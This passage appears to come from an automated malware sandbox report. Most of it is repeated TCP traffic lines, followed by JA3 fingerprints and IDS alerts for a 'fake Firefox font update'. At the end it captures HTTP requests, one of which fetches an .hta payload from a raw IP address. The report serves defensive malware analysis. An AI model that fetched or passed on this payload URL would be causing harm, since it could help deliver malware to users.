Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.7:49701
Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 13.107.246.40:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 13.107.246.40:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 13.107.246.40:443
Source: global trafficHTTP traffic detected: GET /KKhF4w?&insolence=nauseating&president HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: agr.myConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bestkissingdayswithgreatnicebeautygirlsareound.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.216.141
